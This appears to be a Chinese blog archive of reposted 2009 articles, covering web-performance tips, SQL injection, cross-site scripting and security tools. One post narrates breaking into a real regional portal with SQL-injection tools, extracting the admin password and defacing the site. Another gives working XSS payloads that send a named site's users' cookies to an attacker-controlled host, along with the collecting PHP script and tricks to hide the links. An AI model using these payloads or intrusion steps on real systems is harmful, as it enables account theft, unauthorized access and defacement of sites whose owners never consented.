    • 设置合理的过期时间。较早地Expire时间和不要过早去清除coockie,都会改善用户的响应时间。

    28、对于页面内容使用无coockie域名
          当浏览器在请求中同时请求一张静态的图片和发送coockie时,服务器对于这些coockie不会做任何地使用。因此他们只是因为某些负面因素而创建的网络传输。所有你应该确定对于静态内容的请求是无coockie的请求。创建一个子域名并用他来存放所有静态内容。
          如果你的域名是www.example.org,你可以在static.example.org上存在静态内容。但是,如果你不是在www.example.org上而是在顶级域名example.org设置了coockie,那么所有对于static.example.org的请求都包含coockie。在这种情况下,你可以再重新购买一个新的域名来存在静态内容,并且要保持这个域名是无coockie的。Yahoo!使用的是ymig.com,YouTube使用的是ytimg.com,Amazon使用的是images-anazon.com等等。
          使用无coockie域名存在静态内容的另外一个好处就是一些代理(服务器)可能会拒绝对coockie的内容请求进行缓存。一个相关的建议就是,如果你想确定应该使用example.org还是www.example.org作为你的一主页,你要考虑到coockie带来的影响。忽略掉www会使你除了把coockie设置到*.example.org(*是泛域名解析,代表了所有子域名译者dudo注)外没有其它选择,因此出于性能方面的考虑最好是使用带有www的子域名并且在它上面设置coockie。

    29、优化图像
          设计人员完成对页面的设计之后,不要急于将它们上传到web服务器,这里还需要做几件事:

    • 你可以检查一下你的GIF图片中图像颜色的数量是否和调色板规格一致。 使用imagemagick中下面的命令行很容易检查:
      identify -verbose image.gif
      如果你发现图片中只用到了4种颜色,而在调色板的中显示的256色的颜色槽,那么这张图片就还有压缩的空间。
    • 尝试把GIF格式转换成PNG格式,看看是否节省空间。大多数情况下是可以压缩的。由于浏览器支持有限,设计者们往往不太乐意使用PNG格式的图片,不过这都是过去的事情了。现在只有一个问题就是在真彩PNG格式中的alpha通道半透明问题,不过同样的,GIF也不是真彩格式也不支持半透明。因此GIF能做到的,PNG(PNG8)同样也能做到(除了动画)。下面这条简单的命令可以安全地把GIF格式转换为PNG格式:
      convert image.gif image.png
      “我们要说的是:给PNG一个施展身手的机会吧!”
    • 在所有的PNG图片上运行pngcrush(或者其它PNG优化工具)。例如:
      pngcrush image.png -rem alla -reduce -brute result.png
    • 在所有的JPEG图片上运行jpegtran。这个工具可以对图片中的出现的锯齿等做无损操作,同时它还可以用于优化和清除图片中的注释以及其它无用信息(如EXIF信息):
      jpegtran -copy none -optimize -perfect src.jpg dest.jpg

    30、优化CSS Spirite

    • 在Spirite中水平排列你的图片,垂直排列会稍稍增加文件大小;
    • Spirite中把颜色较近的组合在一起可以降低颜色数,理想状况是低于256色以便适用PNG8格式;
    • 便于移动,不要在Spirite的图像中间留有较大空隙。这虽然不大会增加文件大小但对于用户代理来说它需要更少的内存来把图片解压为像素地图。100x100的图片为1万像素,而1000x1000就是100万像素。


    31、不要在HTML中缩放图像
          不要为了在HTML中设置长宽而使用比实际需要大的图片。如果你需要:
    <img width="100" height="100" src="mycat.jpg" alt="My Cat" />
    那么你的图片(mycat.jpg)就应该是100x100像素而不是把一个500x500像素的图片缩小使用。

    32、favicon.ico要小而且可缓存
          favicon.ico是位于服务器根目录下的一个图片文件。它是必定存在的,因为即使你不关心它是否有用,浏览器也会对它发出请求,因此最好不要返回一个404 Not Found的响应。由于是在同一台服务器上,它每被请求一次coockie就会被发送一次。这个图片文件还会影响下载顺序,例如在IE中当你在onload中请求额外的文件时,favicon会在这些额外内容被加载前下载。
          因此,为了减少favicon.ico带来的弊端,要做到:

    • 文件尽量地小,最好小于1K
    • 在适当的时候(也就是你不要打算再换favicon.ico的时候,因为更换新文件时不能对它进行重命名)为它设置Expires文件头。你可以很安全地把Expires文件头设置为未来的几个月。你可以通过核对当前favicon.ico的上次编辑时间来作出判断。

    Imagemagick可以帮你创建小巧的favicon。

    33、保持单个内容小于25K
          这条限制主要是因为iPhone不能缓存大于25K的文件。注意这里指的是解压缩后的大小。由于单纯gizp压缩可能达不要求,因此精简文件就显得十分重要。
          查看更多信息,请参阅Wayne Shea和Tenni Theurer的文件“Performance Research, Part 5: iPhone Cacheability - Making it Stick”

    34、打包组件成复合文本
          把页面内容打包成复合文本就如同带有多附件的Email,它能够使你在一个HTTP请求中取得多个组件(切记:HTTP请求是很奢侈的)。当你使用这条规则时,首先要确定用户代理是否支持(iPhone就不支持)。

     

     

  • 利用SQL注入2分钟入侵网站全程实录

    2009-04-07 11:30:26

    说起流光、溯雪、乱刀,可以说是大名鼎鼎无人不知无人不晓,这些都是小榕哥的作品。每次一提起小榕哥来,我的崇拜景仰就如滔滔江水,连绵不绝~~~~(又来了!) 让我们崇拜的小榕哥最新又发布了SQL注入工具,这回喜欢利用SQL注入入侵网站的黑友们有福了。小榕哥的工具就是强!偶用它来搞定我们本地的信息港,从寻找注入漏洞到注入攻击成功,通过准确计时,总共只用了3分还差40秒,呵呵,王者风范,就是强啊!不信吗?看看我的入侵过程吧。

      一、下载榕哥的工具包
      小榕哥的这个SQL注入攻击工具包在榕哥的站点http://www.netxeyes.com/main.html可以下载到,不过这个工具太火爆了,下载的人实在太多,你觉得慢的话,可以到其它大的黑软站点搜索一下,绝对可以找到的。
      下载来的这个工具包中总有两个小程序:"wed.exe"和"wis.exe",其中"wis.exe"是用来扫描某个站点中是否存在SQL注入漏洞的;"wed.exe"则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单,结合起来,就可以完成从寻找注入点到注入攻击完成的整个过程。

      二、寻找SQL注入点
      "wis.exe"使用的格式如下:"wis.exe 网址",这里以笔者检测本地信息港为例:首先打开命令提示窗口,输入如下命令:"wis.exe http://www.as.***.cn/"。


    小提示:在输入网址时,前面的"http://";和最后面的"/"是必不可少的,否则将会提示无法进行扫描。

      输入完毕后回车,即可开始进行扫描了。很快得到了扫描结果,可以看到这个网站中存在着很多SQL注入漏洞,我们随便挑其中一个来做试验,就挑"/rjz/sort.asp?classid=1"吧。


    打开浏览器,在地址栏中输入"http://www.as.***.cn/rjz/sort.asp?classid=1",打开了网站页面,呵呵,原来是一个下载网页。现在来对它进行SQL注入,破解出管理员的帐号来吧!

     三、SQL注入破解管理员帐号
      现在进入命令窗口中,使用刚才下载的工具包中的"wed.exe"程序,命令使用格式为:"wed.exe 网址"输入如下命令:"wed.exe http://www.as.***.cn/rjz/sort.asp?classid=1"。回车后可看到命令运行情况。

    小提示:这次输入网址时,最后面千万不要加上那个"/",但前面的"http://";头也还是必不可少的。

      可以看到程序自动打开了工具包中的几个文件,"C:\wed\wed\TableName.dic"、
    "C:\wed\wed\UserField.dic"和"C:\wed\wed\PassField.dic",这几个文件分别是用来破解用户数据库中的字表名、用户名和用户密码所需的字典文件。当然我们也可以用其它的工具来生成字典文件,不过想想小榕哥以前出的"黑客字典"那么的强大,还用得着去多此一举吗?
      在破解过程中还可以看到"SQL Injection Detected."的字符串字样,表示程序还会对需要注入破解的网站进行一次检测,看看是否存在SQL注入漏洞,成功后才开始猜测用户名。
      开始等待吧!呵呵,很快就获得了数据库表名"admin",然后得到用户表名和字长,为"username"和"6";再检测到密码表名和字长,为"password"和"8"。看来用户的密码还起得挺长的呢,如果手工破解出这个用户密码来,一定要花上不少时间的!


    正想着手工注入会有多困难时,"wed.exe"程序已经开始了用户名和密码的破解。很快的,就得到了用户名和密码了——"admina"、"pbk&7*8r"!天啦,这也太容易了吧!还不到一分钟呢

    四、搜索隐藏的管理登录页面
      重新回到刚才的软件下载页面中,任意点击了一个软件下载链接,哎呀?怎么可以随便下载的呢!不像以前碰到的收费网站,要输入用户名和密码才可以下载。看来这是免费下载的网站,我猜错了攻击对象,不过既然都来了,就看看有没有什么可利用的吧?
      拿到了管理员的帐号,现在看来我们只有找到管理员登录管理的入口才行了。在网页上找遍了也没有看到什么管理员的入口链接,看来还是得让榕哥出手啦!
      再次拿出"wis.exe"程序,这个程序除了可以扫描出网站中存在的所有SQL注入点外,还可以找到隐藏的管理员登录页面。在命令窗口中输入
    "wis.exe http://www.as.***.cn/rjz/sort.asp?classid=1/ /a"。注意这里输入了一个隐藏的参数"/a"。

    怎么会扫描不成功呢?呵呵,原来这是扫描注入点,当然不能成功了,管理员登录页面只可能隐藏在整个网站的某个路径下。于是输入"wis.exe http://www.as.***.cn/ /a",对整个网站进行扫描。注意扫描语句中网址的格式。程序开始对网站中的登录页面进行扫描,在扫描过程中,找到的隐藏登录页面会在屏幕上以红色进行显示。很快就查找完了,在最后以列表显示在命令窗口中。可以看到列表中有多个以"/rjz/"开头的登录页面网址,包括"/rjz/gl/manage.asp"、"/rjz/gl/login.asp"、"/rjz/gl/admin1.asp"等。就挑"/rjz/gl/admin1.asp"吧,反正这些都是管理员登录的页面想用哪个都可以。
      在浏览器中输入网址" http://www.as.***.cn/rjz/gl/admin1.asp",呵呵,出现了本来隐藏着的管理员登录页面。输入用户名和密码,就进入到后台管理系统,进来了做些什么呢?当然不能搞破坏啦,看到有一个添加公告的地方,好啊,就在这儿给管理员留下一点小小的通知吧!


    看看最后我更改过的主页,冰河洗剑的大名留在了信息港上,不过可没有破坏什么东西啊!我和网页管理员也是朋友,他会原谅我这个小小的玩笑吧!?

  • 三步堵死SQL注入漏洞

    2009-04-07 11:15:43

    SQL注入是什么?

      许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的数据,这就是所谓的SQL Injection,即SQL注入。
    网站的恶梦——SQL注入

      SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户,从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序,对网站和访问该网站的网友都带来巨大危害。

    防御SQL注入有妙法

      第一步:很多新手从网上下载SQL通用防注入系统的程序,在需要防范注入的页面头部用 来防止别人进行手动注入测试(。

      可是如果通过SQL注入分析器就可轻松跳过防注入系统并自动分析其注入点。然后只需要几分钟,你的管理员账号及密码就会被分析出来。


    第二步:对于注入分析器的防范,笔者通过实验,发现了一种简单有效的防范方法。首先我们要知道SQL注入分析器是如何工作的。在操作过程中,发现软件并不是冲着“admin”管理员账号去的,而是冲着权限(如flag=1)去的。这样一来,无论你的管理员账号怎么变都无法逃过检测。

      第三步:既然无法逃过检测,那我们就做两个账号,一个是普通的管理员账号,一个是防止注入的账号,为什么这么说呢?笔者想,如果找一个权限最大的账号制造假象,吸引软件的检测,而这个账号里的内容是大于千字以上的中文字符,就会迫使软件对这个账号进行分析的时候进入全负荷状态甚至资源耗尽而死机。下面我们就来修改数据库吧。

      1.对表结构进行修改。将管理员的账号字段的数据类型进行修改,文本型改成最大字段255(其实也够了,如果还想做得再大点,可以选择备注型),密码的字段也进行相同设置。

      2.对表进行修改。设置管理员权限的账号放在ID1,并输入大量中文字符(最好大于100个字)。

      3.把真正的管理员密码放在ID2后的任何一个位置(如放在ID549上)。

      我们通过上面的三步完成了对数据库的修改。

      这时是不是修改结束了呢?其实不然,要明白你做的ID1账号其实也是真正有权限的账号,现在计算机处理速度那么快,要是遇上个一定要将它算出来的软件,这也是不安全的。我想这时大多数人已经想到了办法,对,只要在管理员登录的页面文件中写入字符限制就行了!就算对方使用这个有上千字符的账号密码也会被挡住的,而真正的密码则可以不受限制。

  • 跨站脚本执行漏洞详解

    2009-04-07 10:46:16

    本文来源:黑客基地

    本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该漏洞。由于时间仓促,水平有限,本文可能有不少错误,希望大家不吝赐教。

    声明,请不要利用本文介绍的任何内容,代码或方法进行破坏,否则一切后果自负!

    【漏洞成因】
    原因很简单,就是因为CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换。

    【漏洞形式】
    这里所说的形式,实际上是指CGI输入的形式,主要分为两种:
    1.显示输入
    2.隐式输入
    其中显示输入明确要求用户输入数据,而隐式输入则本来并不要求用户输入数据,但是用户却可以通 过输入数据来进行干涉。
    显示输入又可以分为两种:
    1. 输入完成立刻输出结果
    2. 输入完成先存储在文本文件或数据库中,然后再输出结果
    注意:后者可能会让你的网站面目全非!:(
    而隐式输入除了一些正常的情况外,还可以利用服务器或CGI程序处理错误信息的方式来实施。

    【漏洞危害】
    大家最关心的大概就要算这个问题了,下面列举的可能并不全面,也不系统,但是我想应该是比较典 型的吧。
    1. 获取其他用户Cookie中的敏感数据
    2. 屏蔽页面特定信息
    3. 伪造页面信息
    4. 拒绝服务攻击
    5. 突破外网内网不同安全设置
    6. 与其它漏洞结合,修改系统设置,查看系统文件,执行系统命令等
    7. 其它
    一般来说,上面的危害还经常伴随着页面变形的情况。而所谓跨站脚本执行漏洞,也就是通过别人的 网站达到攻击的效果,也就是说,这种攻击能在一定程度上隐藏身份。

    【利用方式】
    下面我们将通过具体例子来演示上面的各种危害,这样应该更能说明问题,而且更易于理解。为了条 理更清晰一些,我们将针对每种危害做一个实验。
    为了做好这些实验,我们需要一个抓包软件,我使用的是Iris,当然你可以选择其它的软件,比如 NetXray什么的。至于具体的使用方法,请参考相关帮助或手册。
    另外,需要明白的一点就是:只要服务器返回用户提交的信息,就可能存在跨站脚本执行漏洞。
    好的,一切就绪,我们开始做实验!:)

    实验一:获取其他用户Cookie中的敏感信息
    我们以国内著名的同学录站点5460.net为例来说明一下,请按照下面的步骤进行:
    1. 进入首页http://www.5460.net/
    2. 输入用户名“<h1>”,提交,发现服务器返回信息中包含了用户提交的“<h1>”。
    3. 分析抓包数据,得到实际请求:
    http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6
    4. 构造一个提交,目标是能够显示用户Cookie信息:
    http://www.5460.net/txl/login/login.pl?username=<script>alert(document.cookie)</ script>&passwd=&ok.x=28&ok.y=6
    5. 如果上面的请求获得预期的效果,那么我们就可以尝试下面的请求:
    http://www.5460.net/txl/login/login.pl?username=<script>window.open("http://www.notfound.org/ info.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6
    其中http://www.notfound.org/info.php是你能够控制的某台主机上的一个脚本,功能是获取查询字符串的信 息,内容如下:
    <?php
    $info = getenv("QUERY_STRING");
    if ($info) {
    $fp = fopen("info.txt","a");
    fwrite($fp,$info."/n");
    fclose($fp);
    }
    header("Location: http://www.5460.net");
    注:“%2B”为“+”的URL编码,并且这里只能用“%2B”,因为“+”将被作为空格处理。后面的header语 句则纯粹是为了增加隐蔽性。
    6. 如果上面的URL能够正确运行的话,下一步就是诱使登陆5460.net的用户访问该URL,而我们就可以 获取该用户Cookie中的敏感信息。
    7. 后面要做什么就由你决定吧!

    实验二:屏蔽页面特定信息
    我们仍然以5460.net作为例子,下面是一个有问题的CGI程序:
    http://www.5460.net/txl/liuyan/liuyanSql.pl
    该CGI程序接受用户提供的三个变量,即nId,csId和cName,但是没有对用户提交的cName变量进行任何检 查,而且该CGI程序把cName的值作为输出页面的一部分,5460.net的用户应该都比较清楚留言右下角有你 的名字,对吧?
    既然有了上面的种种条件,我们可以不妨作出下面的结论:
    某个用户可以“屏蔽”其两次留言之间的所有留言!
    当然,我们说的“屏蔽”不是“删除”,用户的留言还是存在的,只不过由于HTML的特性,我们无法从 页面看到,当然如果你喜欢查看源代码的话就没有什么用处了,但是出了我们这些研究CGI安全的人来 说,有多少人有事没事都看HTML源代码?
    由于种种原因,我在这里就不公布具体的细节了,大家知道原理就好了。
    注:仔细想想,我们不仅能屏蔽留言,还能匿名留言,Right?

    实验三:伪造页面信息
    如果你理解了上面那个实验,这个实验就没有必要做了,基本原理相同,只是实现起来稍微麻烦一点而 已。

    实验四:拒绝服务攻击
    现在应该知道,我们在某种程度上可以控制存在跨站脚本执行漏洞的服务器的行为,既然这样,我们 就可以控制服务器进行某种消耗资源的动作。比如说运行包含死循环或打开无穷多个窗口的JavaScript脚本 等等。这样访问该URL的用户系统就可能因此速度变慢甚至崩溃。同样,我们也可能在其中嵌入一些脚 本,让该服务器请求其它服务器上的资源,如果访问的资源比较消耗资源,并且访问人数比较多的话,那 么被访问的服务器也可能被拒绝服务,而它则认为该拒绝服务攻击是由访问它的服务器发起的,这样就可 以隐藏身份。

    实验五:突破外网内网不同安全设置
    这个应该很好理解吧,一般来说我们的浏览器对不同的区域设置了不同的安全级别。举例来说,对于 Internet区域,可能你不允许JavaScript执行,而在Intranet区域,你就允许JavaScript执行。一般来说,前者的 安全级别都要高于后者。这样,一般情况下别人无法通过执行恶意JavaScript脚本对你进行攻击,但是如果 与你处于相同内网的服务器存在跨站脚本执行漏洞,那么攻击者就有机可乘了,因为该服务器位于Intranet 区域。

    实验六:与其它漏洞结合,修改系统设置,查看系统文件,执行系统命令等
    由于与浏览器相关的漏洞太多了,所以可与跨站脚本执行漏洞一起结合的漏洞也就显得不少。我想这 些问题大家都应该很清楚吧,前些时间的修改IE标题漏洞,错误MIME类型执行命令漏洞,还有多种多样 的蠕虫,都是很好的例子。
    更多的例子请参考下列链接:
    Internet Explorer Pop-Up OBJECT Tag Bug
    http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html
    Internet Explorer Javascript. Modeless Popup Local Denial of Service Vulnerability
    http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html
    MSIE6 can read local files
    http://www.xs4all.nl/~jkuperus/bug.htm
    MSIE may download and run progams automatically
    http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html
    File extensions spoofable in MSIE download dialog
    http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html
    the other IE cookie stealing bug (MS01-055)
    http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html
    Microsoft Security Bulletin MS01-055
    http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html
    Serious security Flaw in Microsoft Internet Explorer - Zone Spoofing
    http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html
    Incorrect MIME Header Can Cause IE to Execute E-mail Attachment
    http://www.kriptopolis.com/cua/eml.html

    跨站脚本执行漏洞在这里的角色就是隐藏真正攻击者的身份。

    实验七:其它
    其实这类问题和跨站脚本执行漏洞没有多大关系,但是在这里提一下还是很有必要的。问题的实质还 是CGI程序没有过滤用户提交的数据,然后进行了输出处理。举个例子来说,支持SSI的服务器上的CGI程 序输出了用户提交的数据,无论该数据是采取何种方式输入,都可能导致SSI指令的执行。当然,这是在服 务端,而不是客户端执行。其实像ASP,PHP和Perl等CGI语言都可能导致这种问题。

    【隐藏技巧】
    出于时间的考虑,我在这里将主要讲一下理论了,相信不是很难懂,如果实在有问题,那么去找本书 看吧。
    1. URL编码
    比较一下:
    http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6
    http://www.5460.net/txl/login/login.pl?username=%3C%68%31%3E&passwd=&ok.x=28&ok.y=6
    你觉得哪个更有隐蔽性?!

    2. 隐藏在其它对象之下
    与直接给别人一个链接相比,你是否决定把该链接隐藏在按钮以下更好些呢?

    3. 嵌入页面中
    让别人访问一个地址(注意这里的地址不同于上面提到的URL),是不是又要比让别人按一个按钮容易得 多,借助于Iframe,你可以把这种攻击变得更隐蔽。

    4. 合理利用事件
    合理使用事件,在某些情况上可以绕过CGI程序对输入的限制,比如说前些日子的SecurityFocus的跨站脚本 执行漏洞。

    【注意事项】
    一般情况下直接进行类似<script>alert(document.cookie)</script>之类的攻击没有什么问题,但是有时 CGI程序对用户的输入进行了一些处理,比如说包含在’’或””之内,这时我们就需要使用一些小技巧 来绕过这些限制。
    如果你对HTML语言比较熟悉的话,绕过这些限制应该不成问题。

    【解决方法】
    要避免受到跨站脚本执行漏洞的攻击,需要程序员和用户两方面共同努力:
    程序员:
    1. 过滤或转换用户提交数据中的HTML代码
    2. 限制用户提交数据的长度

    用户:
    1. 不要轻易访问别人给你的链接
    2. 禁止浏览器运行JavaScript和ActiveX代码

    附:常见浏览器修改设置的位置为:
    Internet Explorer:
    工具->Internet选项->安全->Internet->自定义级别
    工具->Internet选项->安全->Intranet->自定义级别
    Opera:
    文件->快速参数->允许使用Java
    文件->快速参数->允许使用插件
    文件->快速参数->允许使用JavaScript.

    【常见问题】
    Q:跨站脚本执行漏洞在哪里存在?
    A:只要是CGI程序,只要允许用户输入,就可能存在跨站脚本执行漏洞。

    Q:跨站脚本执行漏洞是不是只能偷别人的Cookie?
    A:当然不是!HTML代码能做的,跨站脚本执行漏洞基本都能做。

  • WebInspect网页程序扫描器

    2009-03-31 15:02:31

    一、 简介

    WebInspect:强大的网页程序扫描器

    WebInspect对于专业人员不必多说,在黑客工具排名前100中能找到它的身影。

     SPI Dynamics' WebInspect应用程序安全评估工具帮您识别已知和未知的网页层漏洞。它还能检测到Web服务器的配置属性,以及进行常见的网页攻击,例如参数注入、跨网站脚本、目录游走等等。

    发现Ajax安全缺陷的一个方法是借助于安全测试应用软件。这一方面,Cenzic的Hailstorm可以针对基于Ajax的Web应用程序进行精确动作分析。Hailstorm可以自动模拟某些最复杂的基于流的攻击,让开发者看到真实世界的黑客是如何攻入他们的Web应用程序并窃取安全数据的。
    Hailstorm使开发者可以实时检查所有安全缺陷,以了解某些注入攻击代码如何被执行以及被攻击的目标Web应用如何响应。Hailstorm还从不同的技术角度来提供建议来修正代码。不过由于Web应用技术如此不同,Hailstorm只是给出了通用的修补建议,而不提供具体的修正代码。
    根据Cenzic,当Ajax应用程序发出服务器请求时出现的两个主要安全弱点是:输入确认(诸如SQL和脚本注入)和授权。对开发者的关键挑战是要防止来自注入攻击的反馈信息。 
    例如,当发出HTTP请求后,提交的参数被连接符号&分开,这使得黑客可以根据参数来查看服务器的响应。黑客可以创建定制的HTTP头,通过插入调用函数,服务器端就会运行恶意脚本。通过Hailstorm,开发者能够识别存在于HTTP头内的注入代码的安全缺陷。
    Hailstorm还可以检查任何基于提交数据的注入攻击。对于有安全弱点的HTTP头,Hailstorm可以产生跨站点脚步攻击和SQL注入攻击来测试服务器请求和脚本执行。Hailstorm可以在HTTP头中插入空函数来看页面结构是否能被恶意函数改变。为了得到XML节点的信息和被调用的函数,黑客们通常喜欢使用空函数来接收来自服务器的信息。 由于Ajax请求通常是基于XMLHTTP协议的,开发者可以动态的改变提交数据的架构,以提供从Web应用到客户端浏览器的即时Ajax数据结果。但是这个功能也可以被利用。例如假如黑客可以改变任何函数的话,他们可以在页面上放一个类似弹出窗口类的垃圾信息。
    观察攻击Ajax请求的最佳时间也是非常重要的,因为不是所有的Ajax方法调用都是有用的。在页面加载的时候,对页面所做的Ajax改变需要按照服务器端模块或内部终端用户的响应来进行,因为Ajax请求是一个中间请求。
    内部终端用户的例子是那些需要计算来自银行或其他金融机构的表格的人们。为了测定那些Ajax请求会导致什么情况,Hailstorm在服务器端利用一个浏览器来跟踪内部用户的基于事件的响应,并跟踪那些请求一直到客户浏览器的页面加载。
    举例来说,对表格数据执行了Ajax注入后,Hailstorm用户可以分析响应数据大小。假若内部用户点击了一个来自基于Ajax的SQL注入产生的JavaScript弹出窗口后,从Web应用中得来的数据会产生一个安全漏洞,使得黑客可以查看财政数据的表格。Hailstorm输出可以在页面加载的时候测定特定的产生这个漏洞的实例,方法是给每一个交易打上一个水印标识。这个功能可以模仿黑客实际所采取的做法,从而提供一个状态评估来维护Web应用的状态。

  • 15款最好的Windows系统安全检测工具

    2009-03-31 14:53:14

    基于Widnows平台的电脑,有7类常见的安全测试工具,它们是:

      1. 端口扫描 (Port scanners)
      2. 网络/操作系统弱点扫描 (Network/OS vulnerability scanners
      3. 应用程序/数据库弱点扫描 (Application/database vulnerability scanners)
      4. 密码破解 (Password crackers)
      5. 文件查找工具 (File searching tools)
      6. 网络分析 (Network analyzers)
      7. 漏洞检查工具

    工具名称 相关站点 擅长方面
    免费
    SuperScan version 3 www.foundstone.com/resources/proddesc/superscan3.htm 快速并且易用的端口扫描器,可以在运行的系统中寻找开放的端口和正在运行的服务,抓取banner信息包括软件的版本。
    SoftPerfect Network Scanner www.softperfect.com/products/networkscanner 映射MAC地址到IP地址,可以帮你定位随机的有线和无线的系统 
    NetBIOS Auditing Tool (NAT) www.cotse.com/tools/netbios.htm 灵巧的Windows网络共享密码的破解工具
    Winfingerprint http://winfingerprint.sourceforge.net Windows 信息列举工具,它可以搜索到补丁的等级信息,NetBIOS信息,用户信息等
    Metasploit www.metasploit.org 一个强大的查找基于Windows平台弱点的工具
    Cain & Abel www.oxid.it 一个很不错的混合密码破解工具
    商用
    QualysGuard www.qualys.com 强大且易用且全面的网络/操作系统弱点扫描工具,适用于上千种新老漏洞。
    GFI LANguard Network Security Scanner www.gfi.com/lannetscan 一套完美的定位于Windows系统,功能强大且价格低廉的的网络/操作系统弱点扫描工具
    N-Stealth www.nstalker.com 一款物美价廉的针对运行IIS的系统扫描工具
    WebInspect www.spidynamics.com/products/webinspect/index.html 彻底的挖掘基于IIS,Apach等系统的Web应用程序弱点
    WinHex www.winhex.com/winhex/index-m.html 查找运行程序遗留于内存中的敏感信息 -- 完全搜索类似于“密码”,“SSN”,等等之类的文本信息。以发现那些未清除干净的敏感信息
    AppDetective for MS SQL Server www.appsecinc.com/products/appdetective/mssql 全面的SQL Server 数据库安全扫描工具
    Proactive Password Auditor www.elcomsoft.com/ppa.html 一个效果明显且简单易用的用户密码破解工具 -- 支持Rainbow Table
    Effective File Search www.sowsoft.com/search.htm 强大的文本搜索工具,适用于搜索本地文件或服务器上的共享文件。 -- 完全搜索类似于“密码”,“SSN”,等等之类的文本信息。 以发现那些未被保护的敏感信息
    EtherPeek www.wildpackets.com/products/etherpeek/overview 完美的网络分析器,可以找出不怀好意的系统,未被认可的协议, 找出上层的讲话者, 以及更多

     

    本文章来源于西盟软件站【www.zmke.com】详细地址:http://www.zmke.com/article/52/80/2006/20060826214.html

  • 页面攻击检测软件

    2008-12-30 09:19:37

Open Toolbar